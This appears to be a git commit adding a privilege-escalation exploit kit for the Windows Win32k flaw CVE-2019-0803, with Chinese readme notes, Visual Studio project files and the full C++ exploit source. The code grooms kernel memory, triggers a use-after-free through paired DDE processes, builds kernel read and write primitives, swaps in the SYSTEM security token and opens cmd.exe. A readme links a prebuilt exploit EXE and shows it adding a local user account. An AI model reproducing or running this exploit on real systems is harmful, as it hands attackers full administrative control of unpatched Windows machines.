add CVE-2019-0803 Win32k漏洞提权工具

CVE-2019-0803/CVE-2019-0803-Win32k Elevation of Privilege Poc.md

@@ -0,0 +1,12 @@
+## CVE-2019-0803-Win32k Elevation of Privilege Poc  
+
+CVE-2019-0803.exe Win32k漏洞提权工具  没有编译的
+
+![](CVE-2019-0803.png)   
+
+另外一个是K8写的成品EXE，提示:自行斟酌使用任何提权EXE：  
+
+`https://github.com/k8gege/K8tools/raw/master/CVE-2019-0803.exe`
+
+使用方法：`CVE-2019-0803.exe cmd "net user test test@321# /add"`
+

CVE-2019-0803/CVE-2019-0803/README.md

@@ -0,0 +1,12 @@
+# CVE-2019-0803
+Win32k Elevation of Privilege Poc
+
+
+Screenshot
+---------------
+![效果图](http://img.arch-vile.com/CVE-2019-0803.png)
+
+
+Reference
+-----------------------------
+(steal Security token) https://github.com/mwrlabs/CVE-2016-7255

CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.27428.2005
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "poc_test", "poc_test\poc_test.vcxproj", "{13B512BD-3E32-4787-9C1C-0966899F3608}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.ActiveCfg = Debug|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x64.Build.0 = Debug|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.ActiveCfg = Debug|Win32
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Debug|x86.Build.0 = Debug|Win32
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.ActiveCfg = Release|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x64.Build.0 = Release|x64
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.ActiveCfg = Release|Win32
+		{13B512BD-3E32-4787-9C1C-0966899F3608}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {FC1892D3-67AE-4D7F-99F6-684EA05DA216}
+	EndGlobalSection
+EndGlobal

CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/main.cpp

@@ -0,0 +1,570 @@
+#include "stdafx.h"
+
+PSHAREDINFO gSharedInfo = NULL;
+
+HWND    hwndIcon1 = NULL;
+HWND    hwndIcon2 = NULL;
+PBYTE   pwndIcon1 = NULL;
+PBYTE   pwndIcon2 = NULL;
+
+HWND    hwndMenu = NULL;
+
+unsigned long long MySecTokenAddr = NULL;
+unsigned long long MyEPROCESSAddr = NULL;
+
+HDC     hdc = NULL;
+HGDIOBJ hgdiObj = NULL;
+PBYTE   pgdiObj = NULL;
+
+HBITMAP hBitmap[1000] = { NULL };
+
+static PBYTE   buffFakePal = NULL;
+static LPACCEL buffAccTabl = NULL;
+
+unsigned long long SystemSecurityTokenAddr = NULL;
+
+static BOOL xxInitExploitInfo(VOID)
+{
+    gSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32"), "gSharedInfo");
+    return TRUE;
+}
+
+static BOOL xxZeroIconWindow2strName(VOID)
+{
+	DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
+
+    DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
+    DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
+    DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
+    DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
+
+	SetWindowLongW(hwndIcon1, offset + 0x0, 0);
+	SetWindowLongW(hwndIcon1, offset + 0x4, 0);
+	SetWindowLongW(hwndIcon1, offset + 0x8, 0);
+	SetWindowLongW(hwndIcon1, offset + 0xC, 0);
+
+    WCHAR szPath[100] = {};
+    GetWindowText(hwndIcon2, szPath, 100);
+    printf("[*]text:%ws\n", szPath);
+
+    if (wcslen(szPath) == 0)
+    {
+        SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
+        SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
+        SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
+        SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
+        return TRUE;
+    }
+    else
+    {
+        return FALSE;
+    }
+}
+
+typedef struct _LARGE_UNICODE_STRING
+{
+    ULONG Length;           // 000
+    ULONG MaximumLength : 31; // 004
+    ULONG bAnsi : 1;          // 004
+    PWSTR Buffer;           // 008
+} LARGE_UNICODE_STRING, * PLARGE_UNICODE_STRING;
+
+static BOOL WriteKernelAddress(UINT64 qwAddress, LPWSTR content)
+{
+    DWORD offset = (DWORD)((pwndIcon2 + OFFSET_STRNAME_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
+
+    //注:这里不要把LARGE_UNICODE_STRING的长度字段设置成0了
+    //DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
+    //DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
+    DWORD dwori3 = GetWindowLong(hwndIcon1, offset + 0x8);
+    DWORD dwori4 = GetWindowLong(hwndIcon1, offset + 0xC);
+
+    //SetWindowLongW(hwndIcon1, offset + 0x0, 0);
+    //SetWindowLongW(hwndIcon1, offset + 0x4, 0);
+    SetWindowLongW(hwndIcon1, offset + 0x8, (qwAddress & 0xffffffff));
+    SetWindowLongW(hwndIcon1, offset + 0xC, (qwAddress & 0xffffffff00000000) >> 32);
+
+    SetWindowText(hwndIcon2, content);
+
+    //SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
+    //SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
+    SetWindowLongW(hwndIcon1, offset + 0x8, dwori3);
+    SetWindowLongW(hwndIcon1, offset + 0xC, dwori4);
+
+    return TRUE;
+}
+
+static int ReadKernelAddress(UINT64 qwAddress)
+{
+    DWORD offset = (DWORD)((pwndIcon2 + OFFSET_SPWNDPARENT_WIN7) - (pwndIcon1 + LENGTH_TAGWND));
+
+    DWORD dwori1 = GetWindowLong(hwndIcon1, offset + 0x0);
+    DWORD dwori2 = GetWindowLong(hwndIcon1, offset + 0x4);
+
+    SetWindowLongW(hwndIcon1, offset + 0x0, (qwAddress & 0xffffffff));
+    SetWindowLongW(hwndIcon1, offset + 0x4, (qwAddress & 0xffffffff00000000) >> 32);
+
+    unsigned int read = (int)GetAncestor(hwndIcon2, GA_PARENT);
+
+    SetWindowLongW(hwndIcon1, offset + 0x0, dwori1);
+    SetWindowLongW(hwndIcon1, offset + 0x4, dwori2);
+
+    return read;
+}
+
+unsigned long long ReadPtrFromKernelMemory(unsigned long long addr) {
+    unsigned int LowAddr = ReadKernelAddress(addr);
+    unsigned int HighAddr = ReadKernelAddress(addr + 4);
+    unsigned long long Addr = ((unsigned long long)HighAddr << 32) + LowAddr;
+    return Addr;
+}
+
+typedef struct _HEAD
+{
+    HANDLE h;
+    DWORD  cLockObj;
+} HEAD, * PHEAD;
+
+typedef struct _THROBJHEAD
+{
+    HEAD h;
+    PVOID pti;
+} THROBJHEAD, * PTHROBJHEAD;
+
+
+typedef struct _THRDESKHEAD
+{
+    THROBJHEAD h;
+    PVOID    rpdesk;
+    PVOID       pSelf;   // points to the kernel mode address
+} THRDESKHEAD, * PTHRDESKHEAD;
+
+
+void FindSecurityTokens() {
+    unsigned long long pti = (unsigned long long)(&((THRDESKHEAD*)pwndIcon1)->h.pti);
+    printf("[*]Searching for current processes EPROCESS structure\n");
+
+    unsigned long long ptiaddress = ReadPtrFromKernelMemory(pti);
+    printf("\tptiaddress == %llx\n", ptiaddress);
+
+    unsigned long long threadTagPointer = ReadPtrFromKernelMemory(ptiaddress);
+    printf("\ttagTHREAD == %llx\n", threadTagPointer);
+
+    unsigned long long kapcStateAddr = ReadPtrFromKernelMemory(threadTagPointer + OFFSET_APCADDR_WIN7);
+    printf("\tkapc_stateAddr == %llx\n", kapcStateAddr);
+
+    MyEPROCESSAddr = ReadPtrFromKernelMemory(kapcStateAddr + OFFSET_APCEPROCESS_WIN7);
+
+    MySecTokenAddr = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7);
+    printf("\tOriginal security token pointer: 0x%llx\n", MySecTokenAddr);
+
+    printf("[*]Searching for SYSTEM security token address\n");
+
+    unsigned long long nextProc = ReadPtrFromKernelMemory(MyEPROCESSAddr + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
+    printf("\tNext eprocess address: 0x%llx\n", nextProc);
+
+    unsigned int pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
+    printf("\tFound pid: 0x%X\n", pid);
+
+    while (true) {
+        nextProc = ReadPtrFromKernelMemory(nextProc + OFFSET_EPROCESSBLINK_WIN7) - OFFSET_EPROCESSBLINK_WIN7;
+        printf("\tNext eprocess address: 0x%llx\n", nextProc);
+
+        pid = ReadKernelAddress(nextProc + OFFSET_EPROCESSPID_WIN7);
+        printf("\tFound pid: 0x%X\n", pid);
+        //Step 9.2
+        if (pid == 4) {
+            printf("\ttarget process found!\n");
+            SystemSecurityTokenAddr = ReadPtrFromKernelMemory(nextProc + OFFSET_SECTOKEN_WIN7);
+            break;
+        }
+    }
+}
+
+static BOOL xxCreateIconWindowEx(VOID)
+{
+	// icon
+	HWND hwnd1 = CreateWindowExW(0,
+		L"#32772",
+		NULL,
+		WS_MINIMIZE | WS_DISABLED,
+		0,
+		0,
+		0,
+		0,
+		NULL,
+		NULL,
+		NULL,
+		NULL);
+	// icon
+	HWND hwnd2 = CreateWindowExW(0,
+		L"#32772",
+		NULL,
+		WS_MINIMIZE | WS_DISABLED,
+		0,
+		0,
+		0,
+		0,
+		NULL,
+		NULL,
+		NULL,
+		NULL);
+
+	PSERVERINFO  psi = gSharedInfo->psi;
+	PHANDLEENTRY phe = gSharedInfo->aheList;
+
+	PBYTE pwnd1 = NULL;
+	PBYTE pwnd2 = NULL;
+
+	for (ULONG c = 0; c < psi->cHandleEntries; c++)
+	{
+		if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd1)
+		{
+			pwnd1 = (PBYTE)phe[c].phead;
+			break;
+		}
+	}
+	for (ULONG c = 0; c < psi->cHandleEntries; c++)
+	{
+		if ((HWND)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hwnd2)
+		{
+			pwnd2 = (PBYTE)phe[c].phead;
+			break;
+		}
+	}
+	if (pwnd1 <= pwnd2)
+	{
+		pwndIcon1 = pwnd1;
+		hwndIcon1 = hwnd1;
+		pwndIcon2 = pwnd2;
+		hwndIcon2 = hwnd2;
+	}
+	else
+	{
+		pwndIcon1 = pwnd2;
+		hwndIcon1 = hwnd2;
+		pwndIcon2 = pwnd1;
+		hwndIcon2 = hwnd1;
+	}
+	printf("[+]WND1: %p, WND2: %p\n", pwndIcon1, pwndIcon2);
+	return TRUE;
+}
+
+static BOOL xxTriggerExploitEx(VOID)
+{
+	DWORD count = 0;
+
+	HACCEL hAccel1[1000] = { NULL };
+	HACCEL hAccel2[1000] = { NULL };
+
+	for (UINT i = 0; i < 200; i++)
+	{
+        //用来塞内存空隙，确保0x350大小的内存碎片间隙刚好被填满，避免后续Bitmap和DIB占坑出现问题
+		LPACCEL Entries = (LPACCEL)malloc(132 * sizeof(Entries));
+		for (UINT i = 0; i < 132; i++)
+		{
+            Entries[i].fVirt = FCONTROL;
+            Entries[i].key = 0x1234;
+            Entries[i].cmd = 0x4444;
+		}
+		hAccel1[i] = NtUserCreateAcceleratorTable(Entries, 132);
+		if (hAccel1[i] == NULL)
+		{
+			break;
+		}
+	}
+
+    //用来占坑
+	for (UINT i = 0; i < 1000; i++)
+	{
+		LPACCEL Entries = (LPACCEL)malloc(533 * sizeof(Entries));
+		for (UINT i = 0; i < 533; i++)
+		{
+            Entries[i].fVirt = FCONTROL;
+            Entries[i].key = 0x1234;
+            Entries[i].cmd = 0x4444;
+		}
+		hAccel2[i] = NtUserCreateAcceleratorTable(Entries, 533);
+	}
+	for (UINT i = 0; i < 400; i++)
+	{
+		hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
+		if (hBitmap[i] == NULL)
+		{
+			break;
+		}
+	}
+	hwndMenu = CreateWindowExW(WS_EX_DLGMODALFRAME | WS_EX_LEFTSCROLLBAR | WS_EX_NOINHERITLAYOUT | WS_EX_LAYOUTRTL | WS_EX_COMPOSITED,
+		L"#32768",
+		L"bar",
+		0x43A | WS_MAXIMIZEBOX | WS_VSCROLL | WS_CAPTION | WS_MAXIMIZE,
+		58,
+		18,
+		60,
+		-23,
+		NULL,
+		NULL,
+		NULL,
+		NULL);
+	NtUserShowWindow(hwndMenu, 0);
+	UpdateWindow(hwndMenu);
+
+	PAINTSTRUCT paint = { 0 };
+	hdc = NtUserBeginPaint(hwndMenu, &paint);
+	hgdiObj = GetCurrentObject(hdc, OBJ_BITMAP);
+
+	pgdiObj = *(PBYTE *)((*(PBYTE *)((*(PBYTE *)(__readgsqword(0x30) + 0x60)) + 0xF8)) + sizeof(HANDLEENTRY) * (WORD)(DWORD_PTR)hgdiObj);
+
+	for (UINT i = 400; i < 800; i++)
+	{
+		hBitmap[i] = CreateBitmap(16, 16, 1, 8, NULL);
+		if (hBitmap[i] == NULL)
+		{
+			break;
+		}
+	}
+
+	for (UINT i = 0; i < 1000; i++)
+	{
+		PBYTE  pacc = NULL;
+		HACCEL hacc = hAccel2[i];
+		PHANDLEENTRY phe = gSharedInfo->aheList;
+		for (UINT c = 0; c < gSharedInfo->psi->cHandleEntries; c++)
+		{
+			if ((HACCEL)(c | (((ULONG_PTR)phe[c].wUniq) << 16)) == hacc)
+			{
+				pacc = (PBYTE)phe[c].phead;
+				break;
+			}
+		}
+		if (pgdiObj == pacc + 0xCB0)
+		{
+			Sleep(1000);
+			return TRUE;
+		}
+	}
+
+	return FALSE;
+}
+
+static VOID xxBuildGlobalAccTableEx(PVOID pcbWndExtra)
+{
+	DWORD num = 0;
+	if (buffFakePal == NULL)
+	{
+		buffFakePal = (PBYTE)malloc(0x98); // PALETTE
+		ZeroMemory(buffFakePal, 0x98);
+		*(PVOID *)(buffFakePal + 0x80) = pcbWndExtra;               //DBI对象中tagRGBQUAD地址修改为第一个窗口WndExtra的地址
+		*(DWORD *)(buffFakePal + 0x1C) = 1; // PALETTE->cEntries
+		*(PVOID *)(buffFakePal + 0x88) = &num;
+	}
+	if (buffAccTabl == NULL)
+	{
+		buffAccTabl = (LPACCEL)malloc(sizeof(ACCEL) * 132);
+		ZeroMemory(buffAccTabl, sizeof(ACCEL) * 132);
+	}
+
+	for (UINT i = 0; i < 132; i++)
+	{
+        buffAccTabl[i].fVirt = FCONTROL;
+        buffAccTabl[i].key = 0x1234;
+        buffAccTabl[i].cmd = 0x4444;
+	}
+	buffAccTabl[11].key = 2;
+	buffAccTabl[11].cmd = 0;
+	buffAccTabl[12].fVirt = 0;
+	buffAccTabl[12].key = 0;
+
+	*(WORD *)&buffAccTabl[15].key = (WORD)((DWORD_PTR)buffFakePal);
+	*(WORD *)&buffAccTabl[15].cmd = (WORD)((DWORD_PTR)buffFakePal >> 16);
+	*(WORD *)&buffAccTabl[16].fVirt = (WORD)((DWORD_PTR)buffFakePal >> 32);
+	*(WORD *)&buffAccTabl[16].key = (WORD)((DWORD_PTR)buffFakePal >> 48);
+}
+
+INT PocMain2()
+{
+	WCHAR szExePath[MAX_PATH] = { 0 };
+	GetModuleFileNameW(NULL, szExePath, MAX_PATH);
+
+	std::cout << "-------------------" << std::endl;
+	std::cout << "POC - CVE-2019-0803" << std::endl;
+	std::cout << "-------------------" << std::endl;
+
+	DWORD times = 0;
+
+	xxInitExploitInfo();
+	xxCreateIconWindowEx();
+    
+    SetWindowText(hwndIcon2, L"abc");
+
+	BOOL bReturn = FALSE;
+	STARTUPINFO si = { 0 };
+	PROCESS_INFORMATION pi = { 0 };
+
+	si = { 0 };
+	pi = { 0 };
+	si.cb = sizeof(STARTUPINFO);
+	bReturn = CreateProcessW(szExePath,
+		(LPWSTR)L" DDEServer",
+		NULL,
+		NULL,
+		FALSE,
+		NULL,
+		NULL,
+		NULL,
+		&si,
+		&pi);
+	if (!bReturn)
+	{
+		return 0;
+	}
+
+	do
+	{
+		printf("[+]trying %d times \r\n", times);
+		if (xxTriggerExploitEx())
+		{
+            printf("[!]xxTriggerExploitEx Success \r\n");
+			break;
+		}
+		NtUserDestroyWindow(hwndMenu);
+	} while (++times < 10);
+
+	HWND hwndSrever = NULL;
+	do
+	{
+		hwndSrever = FindWindowW(NULL, L"DDEServerPoc");
+	} while (hwndSrever == NULL && (Sleep(300), TRUE));
+
+    //将之前获取到的GDI句柄传给DDEServer，用于之后句柄替换触发漏洞
+	SendMessageW(hwndSrever, MSG_DDESERVER_SET_GDI_OBJ_ADDR, (WPARAM)hgdiObj, NULL);
+
+    //getchar();
+	si = { 0 };
+	pi = { 0 };
+	si.cb = sizeof(STARTUPINFO);
+	bReturn = CreateProcessW(szExePath,
+		(LPWSTR)L" DDEClient",
+		NULL,
+		NULL,
+		FALSE,
+		NULL,
+		NULL,
+		NULL,
+		&si,
+		&pi);
+	if (!bReturn)
+	{
+		return 0;
+	}
+
+	HWND hwnd = NULL;
+
+	do
+	{
+		hwnd = FindWindowW(NULL, L"DDEClientPoc");
+	} while (hwnd == NULL && (Sleep(300), TRUE));
+
+	printf("[+]hTriggerWindow %p\n", hwnd);
+
+	for (UINT i = 0; i < 300; i++)
+	{
+		if (hBitmap[i] != NULL)
+		{
+			DeleteObject(hBitmap[i]);
+			hBitmap[i] = NULL;
+		}
+	}
+
+	xxBuildGlobalAccTableEx(pwndIcon1 + OFFSET_CBWNDEXTRA_WIN7);
+
+	SendMessageW(hwnd, MSG_DDESERVER_EXIT, NULL, NULL);
+	WaitForSingleObject(pi.hProcess, INFINITE);
+
+	for (UINT i = 300; i < 700; i++)
+	{
+		if (hBitmap[i] != NULL)
+		{
+			DeleteObject(hBitmap[i]);
+			hBitmap[i] = NULL;
+		}
+	}
+
+	printf("[+]Wait\n");
+
+	Sleep(8000);
+	SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
+
+	HACCEL hAcc[2000] = { NULL };
+	for (UINT i = 0; i < 2000; i++)
+	{
+		hAcc[i] = NtUserCreateAcceleratorTable(buffAccTabl, 132); // UAF
+		if (hAcc[i] == NULL)
+		{
+			break;
+		}
+	}
+
+    RGBQUAD number = {};
+    number.rgbBlue = 0x78;
+    number.rgbGreen = 0x56;
+    number.rgbRed = 0x34;
+
+	if (SetDIBColorTable(hdc, 0, 1, (const RGBQUAD *)&number))
+	{
+        printf("[+]SetDIBColorTable OK\n");
+	}
+
+    if (xxZeroIconWindow2strName())
+    {
+        printf("[+]hTriggerWindow OK\n");
+    }
+    else
+    {
+        printf("[!]hTriggerWindow Failed\n");
+        return 0;
+    }
+
+    FindSecurityTokens();
+    wchar_t strSysSecToken[5] = { 0x00 };
+    strSysSecToken[3] = (SystemSecurityTokenAddr >> 48) & 0xFFFF;
+    strSysSecToken[2] = (SystemSecurityTokenAddr >> 32) & 0xFFFF;
+    strSysSecToken[1] = (SystemSecurityTokenAddr >> 16) & 0xFFFF;
+    strSysSecToken[0] = (SystemSecurityTokenAddr >> 0) & 0xFFFF;
+    printf("[+]Security token to steal: 0x%llx\n", SystemSecurityTokenAddr);
+
+    WriteKernelAddress(MyEPROCESSAddr + OFFSET_SECTOKEN_WIN7, strSysSecToken);
+
+    printf("Run Cmd...\n");
+    system("cmd.exe");
+
+	return 0;
+}
+INT DDEServer();
+INT DDEClient();
+INT main(int argc, char *argv[])
+{
+	if (argc == 1)
+	{
+		PocMain2();
+		return 0;
+	}
+
+	if (argc != 2)
+	{
+		return -1;
+	}
+
+	if (strcmp(argv[1], "DDEServer") == 0)
+	{
+		DDEServer();
+	}
+	else if (strcmp(argv[1], "DDEClient") == 0)
+	{
+		DDEClient();
+	}
+
+
+
+	return 0;
+}

CVE-2019-0803/CVE-2019-0803/win7sp1/poc_test/poc_test.vcxproj

@@ -0,0 +1,176 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>15.0</VCProjectVersion>
+    <ProjectGuid>{13B512BD-3E32-4787-9C1C-0966899F3608}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>poctest</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="struct.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="DDE.cpp" />
+    <ClCompile Include="main.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <CustomBuild Include="x64.asm">
+      <FileType>Document</FileType>
+      <DeploymentContent Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</DeploymentContent>
+      <Command Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> ml64 /Fo $(IntDir)%(fileName).obj /c %(fileName).asm</Command>
+      <Outputs Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(IntDir)%(fileName).obj</Outputs>
+    </CustomBuild>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
